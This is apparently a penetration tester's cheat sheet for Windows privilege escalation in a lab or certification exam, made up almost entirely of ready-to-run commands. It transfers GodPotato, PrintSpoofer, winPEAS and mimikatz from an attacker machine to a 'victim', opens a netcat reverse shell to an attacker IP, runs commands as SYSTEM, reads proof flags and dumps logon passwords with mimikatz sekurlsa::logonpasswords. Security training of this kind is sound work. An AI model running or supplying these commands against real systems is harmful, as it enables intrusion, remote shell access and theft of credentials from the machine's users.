reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
# Run to identify .NET framework version
On Kali machine:
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
On Victim machine:
curl http://192.168.45.239/GodPotato-NET4.exe -o C:\Users\Public\Documents\GodPotato.exe
On Kali machine:
nc -nlvp 446
On Victim machine:
GodPotato -cmd "whoami"
GodPotato -cmd "nc64.exe 192.168.45.165 446 -e cmd"
On Kali machine:
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe
On Victim machine:
curl http://192.168.45.239/PrintSpoofer64.exe -o C:\Users\Public\Documents\PrintSpoofer64.exe
C:\Users\Public\Documents\PrintSpoofer64.exe -i -c <command>
# Execute a Command as root
whoami
whoami /groups
whoami /priv
where /r C:\Users local.txt
where /r C:\Users proof.txt
type C:\Users\Administrator\Desktop\proof.txt
On Kali machine:
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/winPEASx64.exe
On Victim machine:
curl http://192.168.45.165/winPEASx64.exe -o winPEASx64.exe
winPEASx64.exe
On Kali machine:
wget https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe
On Victim machine:
curl http://192.168.45.165/mimikatz.exe -o mimikatz.exe
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords